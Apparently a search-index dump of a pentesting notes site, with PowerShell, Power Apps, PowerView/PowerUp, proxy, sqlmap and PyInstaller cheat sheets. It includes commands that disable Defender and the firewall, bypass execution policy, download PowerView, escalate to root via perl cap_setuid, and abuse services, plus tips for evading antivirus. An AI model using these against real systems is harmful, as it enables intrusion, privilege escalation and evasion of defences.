                        • Middle pane - Shows the canvas app that you're working on.
                        • Right pane - Where you set options such as the layout, properties, and data sources for certain controls.

                        Microsoft Power Platform admin center: Microsoft Power Platform admin center is the centralized place for managing Power Apps for an organization. On this site, you can define and manage different environments to house the apps. For example, you might have separate environments for development and production apps. Additionally, you can define data connections and manage environment roles and data policies.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#simple-data-application","title":"Simple data application","text":"

                        You just need to connect a spreadsheet that contains a table; what you actually connect is the table. PowerApps synchronizes your application with it by adding an id column to the table in your spreadsheet.

                        Your new app will have three components:

                        • Listing page screen.
                        • Details screen
                        • CRUD operations on records: Edit record, Add new record, Delete record.

                        Each item/record corresponds to a row from your connected spreadsheet. A Gallery is a representation of a list of records pulled from a connected table.

                        Saving the application: by default Microsoft will autosave your app, but for that to happen you first need to save it manually once.

                        Tree view displays all the screens of your application. Under the screen level you have the elements that compose your screen. Elements can have sub-elements.

                        Properties

                        Elements have properties. Properties can be set statically or dynamically. Dynamically set properties open the door for users updating values or things like resizing elements based on height, for instance.

                        # This references the connected spreadsheet column name\nThisItem.HeadingColumnName \n\n# This references the value inserted in that element.\nNameofElement.Default \n

                        Additionally, there are formatting functions, like the Text function, that can be applied to a property (whether set statically or dynamically).

                        # Format element to mm/dd/yyyy \nText(ThisItem.HeadingColumnName, \"mm/dd/yyyy\" )\n\n# Concatenate elements \nConcatenate (ThisItem.HeadingColumnName, ThisItem.HeadingColumnName2)\n# For instance: Concatenate (ThisItem.FirstName, ThisItem.LastName)\n\nConcatenate (NameofElement.Default,  NameofElement2.Default)  \n# For instance: Concatenate (First_Name_Card.Default, Last_Name_Card.Default)  \n

                        A data card has a property called Update. This is useful in forms or user input, where what you finally submit to the database is not the raw input but the result of that input after the Update transformation has taken place.

                        When you click the check mark, the form uses the Update property of each of the data cards and submits the result to the underlying data source.

                        More properties:

                        • DisplayMode. This can be set to View, Edit... You can granularly set the property of an element to View (so no editing is possible), or you can set that property on its parent.

                        Triggers

                        Elements have properties and triggers. A trigger is an action that a user performs on an element. Triggers are quite similar to event handlers in JavaScript (onload, onselect, ...).

                        Configuring a trigger: you select an element (e.g., a button), choose the action you want to react to (e.g., OnSelect) and the function you want to assign to it (e.g., SubmitForm). You can separate multiple actions with \";\".

                        Triggers help you build the functionality of your application. For instance, in this basic app, navigation from one screen to another is performed with the Navigate function. Starting the application is a trigger itself.

                        Formulas and functions

                        Formula Reference for PowerApps

                        Canvas application

                        Building an application from scratch.

                        A common practice is to have a master screen and a documentation screen. First, create a master screen that will be used as a template for the rest of the screens in your application. Second, create a screen named Documentation. The master screen is where you create the elements of your app; Documentation is where you assign styles to those elements. Master screen elements will reference the Documentation screen.

                        Variables in Power Apps are different from variables in programming languages. There are 3 types:

                        • Contextual variables: only active on the screen where they were created.
                        • Global variables: accessible from all screens in the application.
                        • Collection variables.

                        How to set up a contextual variable: select an element on the screen, select \"OnSelect\" and add the function:

                        UpdateContext({FirstNumber: TextInput.Text})\n# When the element is selected (for instance an input field), this creates a variable called FirstNumber and assigns it the value of the input field\n

                        How to set up a global variable: use the Set function:

                        Set(CounterGlobal, CounterGlobal+1)\n

                        Collection variables are useful for data tables and galleries.

                        Example: create a button and, on its OnSelect trigger, add this function:

                        Collect(OurCollection, {First: \"Ben\", Second: \"Dover\"})\n# This creates a collection called OurCollection with two columns, First and Second. The first record holds \"Ben\" in column First and \"Dover\" in column Second.\n

                        Create a Gallery and, as its data source, add your collection. This way, every time you click that button you will add \"Ben\" and \"Dover\" as a card to that gallery. Of course, you can replace those two static strings with references to input fields:

                        Collect(OurCollection, {First: TextInput4.Text, Second: TextInput5.Text})\n

                        To remove an item from a collection, add an icon button for removing and, on its OnSelect:

                        Remove(OurCollection, ThisItem)\n

                        Filtering cards displayed in a gallery. Select the Gallery and set its Items property:

                        Search(NameOfTable, <TextToSearch>, <ColumnsToSearchInTable>)\n\n# For example, to display all cards in the connected table \"Table1\":\nSearch(Table1, \"\", \"FirstName\")\n\n# To make it depend on the user's input, create an input field and:\nSearch(Table1, TextInput1.Text, \"FirstName\", \"LastName\", \"Location\")\n

                        Only show the search input when someone clicks on the search icon:

                        • Set the Input search box default visibility to False.
                        • Insert a magnifier icon. OnSelect:

                          UpdateContext({SearchVisible: True})\n
                        • Modify the search input field, setting its Visible property to:

                          SearchVisible\n

                        To toggle SearchVisible back to false (and hide the search input field), we will modify the magnifier icon's OnSelect:

                        UpdateContext({SearchVisible: !SearchVisible})\n

                        Another interesting formula is Filter:

                        # An example of a multi-layered function, combining Filter and Search functionality. Create a dropdown menu > Items\nFilter(Search(Table1, TextInput1.Text, \"FirstName\", \"LastName\", \"Location\"), VIPLevel = Dropdown.Selected.Value)\n

                        And also SubmitForm, which aggregates all the updates in a form control and submits the form.

                        SubmitForm(FormName)\n
                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#well-known-vulnerabilities-under-build","title":"Well-known vulnerabilities (under build)","text":"","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#data-exposure","title":"Data exposure","text":"

                        https://rencore.com/en/blog/how-to-prevent-the-next-microsoft-power-apps-data-leak-from-happening

                        From https://dev.to/wyattdave/ive-just-been-hacked-by-a-power-app-1fj4

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#not-using-service-accounts","title":"Not using Service accounts","text":"

                        The security issue is all around how the Power Platform handles credentials: each user/owner signs in and stores their credentials in connections. This means that if you share a flow created with your user, you are sharing your connections (aka credentials).

                        One way to prevent this issue is by using service accounts.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#sharing-flows","title":"Sharing flows","text":"

                        If you need to share a flow:

                        • Use \"send a copy\", or
                        • share the flow as a run-only user (as that requires their credentials).
                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#configuring-connections-to-the-least-privilege","title":"Configuring connections to the least privilege","text":"

                        When configuring a flow, don't include additional unnecessary connections in it. Given how Power Apps handles connections, this situation may arise:

                        A connection gets set to the highest privilege (you mean to share calendar read access and you end up giving write access to emails).

                        This model has its strengths: all credentials are securely stored, and accessing apps or running flows is easy because the Power Platform handles everything. The problem comes when you share flows, as what you might not realise is that you are sharing your connections (aka credentials) with that user. They may not be able to see your credentials, but that doesn't mean they can't use them in a way that you didn't want. And what's worse, there is no granularity in connections, so an Outlook connection used for reading events can be used to delete emails.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#protecting-powerapps-with-microsoft-sentinel","title":"Protecting PowerApps with Microsoft Sentinel","text":"

                        As Power Platform is part of the Microsoft offering, Microsoft Sentinel addresses many security issues:

                        • Collect Microsoft Power Platform and Power Apps activity logs, audits, and events into the Microsoft Sentinel workspace.
                        • Detect execution of suspicious, malicious, or illegitimate activities within Microsoft Power Platform and Power Apps.
                        • Investigate threats detected in Microsoft Power Platform and Power Apps and contextualize them with additional user activities across the organization.
                        • Respond to Microsoft Power Platform-related and Power Apps-related threats and incidents in a simple and canned manner manually, automatically, or via a predefined workflow.

                        Data connectors for Microsoft Sentinel:

                        | Connector Name | Covered Logs / Inventory |
                        | --- | --- |
                        | Power Platform Inventory (using Azure Functions) | Power Apps and Power Automate inventory data |
                        | Microsoft Power Apps (Preview) | Power Apps activity logs |
                        | Microsoft Power Automate (Preview) | Power Automate activity logs |
                        | Microsoft Power Platform Connectors (Preview) | Power Platform connector activity logs |
                        | Microsoft Power Platform DLP (Preview) | Data loss prevention activity logs |
                        | Dynamics365 | Dataverse and model-driven apps activity logging |

                        Sentinel rules for protecting PowerApps platform:

                        | Rule name | What does it detect? |
                        | --- | --- |
                        | PowerApps - App activity from unauthorized geo | Identifies Power Apps activity from countries in a predefined list of unauthorized countries. |
                        | PowerApps - Multiple apps deleted | Identifies mass delete activity where multiple Power Apps are deleted within a period of 1 hour, matching a predefined threshold of total apps deleted or app delete events across multiple Power Platform environments. |
                        | PowerApps - Data destruction following publishing of a new app | Identifies a chain of events where a new app is created or published, followed by mass update or delete events in Dataverse within 1 hour. The incident severity is raised if the app publisher is on the list of users in the TerminatedEmployees watchlist template. |
                        | PowerApps - Multiple users accessing a malicious link after launching new app | Identifies a chain of events where a new Power App is created, followed by multiple users launching the app within the detection window and clicking on the same malicious URL. |
                        | PowerAutomate - Departing employee flow activity | Identifies instances where an employee who has been notified or is already terminated creates or modifies a Power Automate flow. |
                        | PowerPlatform - Connector added to a Sensitive Environment | Identifies occurrences of new API connector creations within Power Platform, specifically targeting a predefined list of sensitive environments. |
                        | PowerPlatform - DLP policy updated or removed | Identifies changes to DLP policy, specifically policies which are updated or removed. |
                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#attacks","title":"Attacks","text":"

                        Install m365 CLI.
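                        A minimal sketch of installing and authenticating (the npm package name comes from the CLI for Microsoft 365 project; treat the exact names as assumptions):

                        # Install the CLI for Microsoft 365\nnpm i -g @pnp/cli-microsoft365\n\n# Authenticate against the tenant (device code flow by default)\nm365 login\n\n# Verify the session\nm365 status\n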

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#ennumeration-techniques","title":"Ennumeration techniques","text":"

                        Get information about the default Power Apps environment.

                        m365 pa environment get  \n

                        List Microsoft Power Apps environments in the current tenant

                        m365 pa environment list \n

                        List all available apps for that user

                        m365 pa app list  \n

                        List all apps in an environment as Admin

                        m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Remove an app

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

                        Removes the specified Power App without confirmation

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

                        Removes the specified Power App you don't own

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Add an owner without removing the old one

                        m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

                        Export an app

                        m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
                        ","tags":["database","cheat","sheet"]},{"location":"powercat/","title":"Powercat - An alternative to netcat coded in PowerShell","text":"

                        Netcat comes pre-installed in most Linux distributions. There is also a version for Windows: download it from https://nmap.org/download.html.

                        As for Windows machines, there's an alternative to netcat coded in PowerShell called PowerCat.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"powershell/","title":"Powershell","text":""},{"location":"powershell/#basic-commands","title":"Basic commands","text":"
                        # List users of the Administrators group\nnet localgroup Administrators\n\n\n\n# List contents\ndir\nGet-ChildItem -Force\n# -Force: Display hidden files \n\n\n# Print working directory\npwd\nGet-Location\n\n# Change directory\ncd\ncd ..           # go up one level\ncd ..\\siblingdirectory  # go to a sibling directory\ncd ~\\Desktop        # go to the logged-in user's Desktop\n\n# Create a folder\nmkdir nameOfFolder\nNew-Item -ItemType Directory nameOfDirectory\n\n# Display the command history of the session\nhistory\nGet-History\n\n# Browse the command history\nCTRL-R\n\n# Clear screen\nclear\nClear-Host\n\n# Copy item\ncp nameOfSource nameOfDestination\nCopy-Item nameOfSource nameOfDestination\n\n# Copy a folder and its content\ncp originFolder destinationPath -Recurse\nCopy-Item originFolder destinationPath -Recurse\n\n# Get running processes filtered by name\nget-process -name ccSvcHst\n\n# Kill processes called ccSvcHst* (note the wildcard *)\ntaskkill /f /im ccSvcHst*\n\n# Remove a file\nrm nameofFile -Recurse\n# -Recurse: Remove it recursively (in a folder)\n\n# Display content of a file\ncat nameofFile\nGet-Content nameofFile\n\n# Display one page of a file at a time\nmore nameofFile\n\n# Display the first lines of a file\nGet-Content nameofFile -TotalCount 10\n\n# Open a file with an app\nstart nameofApp nameofFile\n\n# Run commands or expressions on the local computer.\n$Command = \"Get-Process\"\nInvoke-Expression $Command\n\n# PS uses Invoke-Expression to evaluate the string. Otherwise the output of $Command would be the text \"Get-Process\". Invoke-Expression is similar to $($command) in linux.\n# IEX is an alias\n\n# Deactivate antivirus from powershell session (if user has rights to do so)\nSet-MpPreference -DisableRealtimeMonitoring $true\n\n# Disable firewall\nnetsh advfirewall set allprofiles state off\n\n\n# Add a registry value\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n
                        "},{"location":"powershell/#powershell-wildcards","title":"Powershell wildcards","text":"

                        The four types of Wildcard:

                        The * wildcard will match zero or more characters

                        The ? wildcard will match a single character

                        [m-n] Match a range of characters from m to n, so [f-m]ake will match fake/jake/make

                        [abc] Match a set of characters a,b,c.., so [fm]ake will match fake/make

                        "},{"location":"powershell/#filters","title":"Filters","text":"

                        Filters are a way to power up our queries in powershell.

                        Example: We can use the Filter parameter with the notlike operator to filter out all Microsoft software (which may be useful when enumerating a system for local privilege escalation vectors).

                        get-ciminstance win32_product -Filter \"NOT Vendor like '%Microsoft%'\" | fl\n

                        The -Filter parameter requires at least one operator:

                        | Filter | Meaning |
                        | --- | --- |
                        | -eq | Equal to |
                        | -le | Less than or equal to |
                        | -ge | Greater than or equal to |
                        | -ne | Not equal to |
                        | -lt | Less than |
                        | -gt | Greater than |
                        | -approx | Approximately equal to |
                        | -bor | Bitwise OR |
                        | -band | Bitwise AND |
                        | -recursivematch | Recursive match |
                        | -like | Like |
                        | -notlike | Not like |
                        | -and | Boolean AND |
                        | -or | Boolean OR |
                        | -not | Boolean NOT |
                        "},{"location":"powershell/#filter-examples-ad-object-properties","title":"Filter Examples: AD Object Properties","text":"

                        The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double-quotes. For example, the following simple search filter using Get-ADUser to find information about the user \"Sally Jones\" can be written as follows:

                        Get-ADUser -Filter \"name -eq 'sally jones'\"\nGet-ADUser -Filter {name -eq 'sally jones'}\nGet-ADUser -Filter 'name -eq \"sally jones\"'\n

                        As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

                        # The asterisk (`*`) can be used as a wildcard when performing queries. \nGet-ADUser -Filter {name -like \"joe*\"}\n# It returns all domain users whose name starts with `joe` (joe, joel, etc.).\n
                        "},{"location":"powershell/#escaping-characters","title":"Escaping characters","text":"

                        When using filters, certain characters must be escaped:

                        | Character | Escaped As | Note |
                        | --- | --- | --- |
                        | \" | `\" | Only needed if the data is enclosed in double-quotes. |
                        | ' | \\' | Only needed if the data is enclosed in single quotes. |
                        | NULL | \\00 | Standard LDAP escape sequence. |
                        | \\ | \\5c | Standard LDAP escape sequence. |
                        | * | \\2a | Escaped automatically, but only in -eq and -ne comparisons. Use -like and -notlike operators for wildcard comparison. |
                        | ( | \\28 | Escaped automatically. |
                        | ) | \\29 | Escaped automatically. |
                        | / | \\2f | Escaped automatically. |
                        "},{"location":"powershell/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"
                        # Display relevant PowerShell version information\necho $PSVersionTable\n\n# Check current execution policy. If the answer is\n# - \"Restricted\": PS scripts cannot run.\n# - \"RemoteSigned\": Downloaded scripts will require the script to be signed by a trusted publisher.\nGet-ExecutionPolicy\n\n# Bypass execution policy\npowershell -ep bypass\n\n# You can tell if PowerShell is running with administrator privileges (a.k.a. \"elevated\" rights) with the following snippet:\n[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'\n# [Security.Principal.WindowsIdentity]::GetCurrent() - Retrieves the WindowsIdentity for the currently running user.\n# (...).groups - Access the groups property of the identity to find out what user groups the identity is a member of.\n# -contains \"S-1-5-32-544\" returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if \"run as administrator\" was used) and otherwise false.\n\n\n# List which processes are elevated:\nGet-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated\n\n# List installed software on a computer\nget-ciminstance win32_product | fl\n\n\n# Gets content from a web page on the internet.\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# aliases: `iwr`, `curl`, and `wget`\n
                        "},{"location":"powershell/#disk-management","title":"Disk Management","text":"
                        # Show disks\nGet-Disk\n\n# Show disks in a more human-readable format\nGet-Disk | FT -AutoSize\n\n# Show partitions from a disk\nGet-Partition -DiskNumber 1\n\n# Create partition\nNew-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter\n\n# Show volume\nGet-Volume -DriveLetter e\n\n# Format disk and assign file system\nFormat-Volume -DriveLetter E -FileSystem NTFS\n\n# Delete partition \nRemove-Partition -DriveLetter E\n
                        "},{"location":"powershell/#disk-management-with-diskpart","title":"Disk Management with diskpart","text":"

                        Diskpart is a command interpreter that helps you manage your computer's drives. How does it work? Before using diskpart commands, you usually have to list and select the object you want to operate on.

                        # To enter the diskpart command interpreter\ndiskpart\n\n# Enumerate disks\nlist disk\n\n# Select disk\nselect disk 0\n\n# Enumerate volumes\nlist volume\n\n# Select volume\nselect volume 1\n\n# Enumerate partitions\nlist partition\n\n# Select partition\nselect partition 2\n\n# Extend a volume (once you have it selected)\nextend size=2048\n\n# Shrink a volume (once you have it selected)\nshrink desired=2048\n
                        "},{"location":"powershell/#howtos","title":"Howtos","text":""},{"location":"powershell/#how-to-delete-shortcuts-from-public-desktop","title":"How to delete shortcuts from Public Desktop","text":"
                        # Instead of \"everyone\" set the group that you prefer\n$acl = Get-ACL \"C:\\Users\\Public\\Desktop\"\n\n$rule = New-Object System.Security.AccessControl.FileSystemAccessRule(\"everyone\",\"FullControl\",\"ContainerInherit,ObjectInherit\",\"None\",\"Allow\")\n\n$acl.SetAccessRule($rule)\n\nSet-ACL \"C:\\Users\\Public\\Desktop\" $acl\n
                        "},{"location":"powershell/#how-to-uninstall-winzip-from-powershell-line-of-command","title":"How to uninstall winzip from powershell line of command","text":"
                        # Show all software installed:\nGet-WmiObject -Class win32_product\n\n# Find the WinZip object\nGet-WmiObject -Class win32_product | where { $_.Name -like \"*Winzip*\"}\n\n# Create a variable for the object\n$wzip = Get-WmiObject -Class win32_product | where { $_.Name -like \"*Winzip*\"}\n\n# Uninstall it:\nmsiexec /x $wzip.localpackage /passive\n

                        This will start the uninstallation of WinZip and will show only the progress bar (because we are using msiexec's /passive switch).

                        "},{"location":"powerup/","title":"PowerUp.ps1","text":"

                        Run from powershell.

                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#installation","title":"Installation","text":"

                        Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

                        Import-Module .\\PowerUp.ps1\n
                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#basic-commands","title":"Basic commands","text":"
                        # Find vulnerable services on the machine\nInvoke-AllChecks\n\n# Exploit a vulnerable service to escalate to the more privileged user that runs that service\nInvoke-ServiceAbuse -Name '<NAME OF THE SERVICE>' -UserName '<DOMAIN CONTROLLER>\\<MY CURRENT USERNAME>'\n
                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerview/","title":"powerview.ps1","text":"

                        "},{"location":"powerview/#powerviewps1","title":"Powerview.ps1","text":"

                        Run from powershell.

                        Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

                        Import-Module .\\Powerview.ps1\n
                        "},{"location":"powerview/#enumeration-cheat-sheet","title":"Enumeration cheat sheet","text":"
                        # Enumerate users\nGet-NetUser\n\n# Enumerate computers in the domain\nGet-NetComputer \nGet-NetComputer | select name\nGet-NetComputer -OperatingSystem \"Linux\"\n\n# Display info of current domain. Pay attention to the forest element, to see if there is a bigger structure\nGet-NetDomain\n\n# Get the SID for the current Domain (useful later for crafting Golden Tickets)\nGet-DomainSID\n\n# Display policies for the Domain and accounts, including for instance LockoutBadAccounts\nGet-DomainPolicy\n\n# Display Domain Controller\nGet-NetDomainController\n\n# List users in the domain. Useful to search for non-expiring passwords, group membership, their SPNs, last time they changed their password... \nGet-NetUser\nGet-NetUser john.doe\n\n# List users associated with a Service Principal Name (SPN) \nGet-NetUser -SPN\n\n# List groups in the domain\nGet-NetGroup\n\n# List Group Policy Objects in domain\nGet-NetGPO\n\n# List Domain Trusts\nGet-NetDomainTrust\n
                        "},{"location":"process-capabilities-getcap/","title":"Process capabilities: getcap","text":"

                        Linux capabilities provide a subset of the available root privileges to a process. For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

                        In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this \u2018permission\u2019 without having it run with complete root privileges. This allows for a more secure system in general.

                        getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on Debian and Debian-based distributions.

                        Scan all files in system and check capabilities:

                        getcap -r / 2>/dev/null\n

                        Check what every capability means in https://linux.die.net/man/7/capabilities

                        Knowing which capability is assigned to a process, try to make the most of it to escalate privileges.

                        Example in HackTheBox: Nunchucks, in which the perl binary has the \"cap_setuid+ep\" capability, which means it can change the effective UID of its process (for instance to 0) and thus escalate to root.
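                        A minimal sketch of abusing that capability, following the GTFOBins approach (assuming getcap reported cap_setuid+ep on the perl binary):

                        # setuid(0) is allowed by cap_setuid, so the spawned shell runs as root\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n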

                        ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#labs","title":"Labs","text":"

                        HackTheBox: nunchucks

                        ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#resources","title":"Resources","text":"

                        Hacktricks

                        https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/

                        ","tags":["privilege escalation","linux"]},{"location":"process-hacker-tool/","title":"Process Hacker tool","text":"","tags":["thick client application"]},{"location":"process-hacker-tool/#usage","title":"Usage","text":"

                        From the course Pentesting thick clients applications.

                        We will be using the portable version.

                        1. Open the application you want to test.

                        2. Open Process Hacker Tool.

                        3. Select the application, right-click on it and choose \"Properties\".

                        4. Select tab \"Memory\".

                        5. Click on \"Strings\".

                        6. Check \"Image\" and \"Mapped\" and search!

                        7. In the results you can use the Filter option to search for (in this case) \"data source\".

                        Other possible searches: Decrypt. A clear-text connection string in memory reveals credentials: pwned!!!

                        ","tags":["thick client application"]},{"location":"proxies/","title":"Proxies","text":"

                        A proxy is a device or service that sits in the middle of a connection and acts as a mediator.

                        • HTTP Proxies: BurpSuite
                        • Tools commonly chained through an HTTP proxy: Postman, mitm_relay
                        • SOCKS/SSH Proxies (for pivoting): Chisel, ptunnel, sshuttle.

                        There are many types of proxy services, but the key ones are:

                        • Dedicated Proxy/Forward Proxy: The Forward Proxy is what most people imagine a proxy to be: a client makes a request to a computer, and that computer carries out the request on its behalf. For example, in a corporate network, sensitive computers may not have direct access to the Internet; to access a website, they must go through a proxy (or web filter).
                        • Reverse Proxy: As you may have guessed, a reverse proxy is the reverse of a Forward Proxy. Instead of being designed to filter outgoing requests, it filters incoming ones. The most common goal with a Reverse Proxy is to listen on an address and forward it to a closed-off network. Many organizations use CloudFlare as they have a robust network that can withstand most DDoS attacks.
                        • Transparent Proxy: intercepts traffic at the network level without requiring any client-side configuration, so clients are usually unaware that their requests go through it.
                        "},{"location":"proxies/#setting-up-postman-with-burpsuite","title":"Setting up Postman with BurpSuite","text":"

                        1 - Postman > Settings

                        2 - Proxy tab. Check:

                        • Use the system proxy
                        • Add a custom proxy configuration
                        • HTTP
                        • HTTPS
                        • 127.0.0.1
                        • 8080

                        3 - BurpSuite. Set up the proxy listener

                        4 - Burp Suite. Intercept mode on

                        5 - Postman. Send the interesting request from your collection

                        6 - Your BurpSuite will intercept that traffic. Now you can send it to Intruder, Repeater, Sequencer...

                        "},{"location":"proxies/#setting-up-mitm_relay-with-burpsuite","title":"Setting up mitm_relay with Burpsuite","text":"

                        In DVTA we will configure the server to the IP of the local machine. In my lab setup my IP was 10.0.2.15.

                        In FTP, we will configure the listening port to 2111. We will also disable the IP check for this lab setup to work.

                        From https://github.com/jrmdev/mitm_relay:

                        This is what we're doing:

                        1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

                        2. mitm_relay encapsulates the application traffic (no matter the protocol) into the HTTP protocol so BurpSuite can read it

                        3. Burp Suite will read the traffic. And we can tamper here our code.

                        4. mitm_relay will \"unfunnel\" the traffic from the HTTP protocol back into the raw one

                        5. In a lab setup the FTP server runs on the same machine, so to avoid a port conflict with mitm_relay we will change the FTP listen port to 2111. In real life this change is not necessary

                        Running mitm_relay:

                        python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means listening on all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationServer>:<listeningPortOnDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

                        And this is what the interception looks like:

                        "},{"location":"proxies/#burpsuite-sqlmap","title":"Burpsuite + sqlmap","text":""},{"location":"proxies/#from-burpsuite","title":"From Burpsuite","text":"

                        Browse the application so that the request that generates the CSRF token is captured in your traffic.

                        Open Settings, go to the Sessions tab and scroll down to the Macros section.

                        Click on \"Add\" (a macro). You will see the already captured requests.

                        Select the request in which the CSRF token is created/refreshed (and not yet used) and click on OK.

                        Name your macro in the \"Macro Editor\" window, for instance GET_csrf, and select \"Configure item\".

                        Now you indicate to Burpsuite where the value of the CSRF token appears in the response. Don't forget to add the name of the parameter. Click on OK.

                        Click on OK in the window \"Macro editor\".

                        You are again in the Settings > Sessions section. The Macros section is at the bottom of the page. Now we are going to configure the \"Session handling rules\" section:

                        Click on \"Add\" (a rule) and the \"Session handling rule editor\" will open.

                        • In Rule description write: PUT_CSRF
                        • In Rule actions, click on \"Add > Run a macro.\"
                        • New window will open for defining the action performed by the macro:
                          • Select the macro GET_csrf.
                          • Select the option \"Update only the following parameter,\" and add in there the name we used before when defining where the token was, \"csrf.\"
                          • In the top menu, select the tab \"Scope,\" and add the url within scope.
                          • IMPORTANT: In Tools Scope, select the module \"Proxy.\" This will allow the sqlmap request to be routed.
                        "},{"location":"proxies/#from-sqlmap","title":"From Sqlmap","text":"

                        Create a file that contains the request that is vulnerable to SQLi and save it.

                        Then:

                        sqlmap -r request.txt -p id --proxy=http://localhost:8080 --current-db --flush-session -vv \n

                        Important: Flag --proxy sends the request via Burpsuite.

                        For blind injections you need to specify other parameters, such as --risk and --level.
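                        For example, a sketch for a boolean-based blind injection (the flag values are illustrative):

                        sqlmap -r request.txt -p id --proxy=http://localhost:8080 --technique=B --level=5 --risk=3 -vv\n# --technique=B: boolean-based blind; --level/--risk widen the set of payloads tested\n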

                        "},{"location":"pyftpdlib/","title":"pyftpdlib","text":"

                        A simple FTP server written in Python.

                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#installation","title":"Installation","text":"
                        sudo pip3 install pyftpdlib\n
                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#basic-usage","title":"Basic usage","text":"

                        By default pyftpdlib uses port 2121; use the --port flag to indicate a different port. Anonymous authentication is enabled by default if we don't set a user and password.

                        sudo python3 -m pyftpdlib --port 21\n

                        Use the option --write to allow clients to upload files to our attack host:

                        sudo python3 -m pyftpdlib --port 21 --write\n
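                        From the target side you can then pull or push files; a minimal sketch with curl (assuming the attack host is at 10.10.14.2 and anonymous authentication):

                        # Download a file from the attack host\ncurl ftp://10.10.14.2/tools.zip -o tools.zip\n\n# Upload loot to the attack host (requires --write on the server)\ncurl -T loot.zip ftp://10.10.14.2/\n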
                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyinstaller/","title":"Pyinstaller","text":"

                        PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files \u2013 including the active Python interpreter! \u2013 and puts them with your script in a single folder, or optionally in a single executable file.

                        ","tags":["pentesting","python"]},{"location":"pyinstaller/#installation","title":"Installation","text":"
                        pip install pyinstaller\n
                        ","tags":["pentesting","python"]},{"location":"pyinstaller/#usage","title":"Usage","text":"
                        pyinstaller /path/to/yourscript.py\n

                        But the real power of pyinstaller comes with one-file executable generation. Additionally, pyinstaller provides a flag to prevent a console window from opening.

                        pyinstaller --onefile --windowed /path/to/yourscript.py\n

                        If the antivirus (signature-based) is able to catch the EXE even before opening it, then you need to change the packaging method, as that changes the signature of the exported EXE.

                        Pyinstaller uses UPX to compress the size of the EXE output. So it's worth trying:

                        pyinstaller --onefile --windowed /path/to/yourscript.py --noupx\n\n# --noupx: Do not use UPX\n

                        Or even other software to export to EXE.

                        If the antivirus (heuristic-based) catches your EXE after opening it, then you need to change the structure or the order of your source code:

                        • Add some random delay.
                        • Add some random operations like create a text file, append random text and then delete the file.
                        • Change the order of doing things.
                        • Offload some operations/commands to subprocess.

                        Tips:

                        Never blindly rely on an antivirus sandbox VM to test an EXE.

                        ","tags":["pentesting","python"]},{"location":"pypykatz/","title":"pypykatz","text":"

                        Mimikatz implementation in pure Python. Runs on all OSes that support Python >= 3.6.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/skelsec/pypykatz.

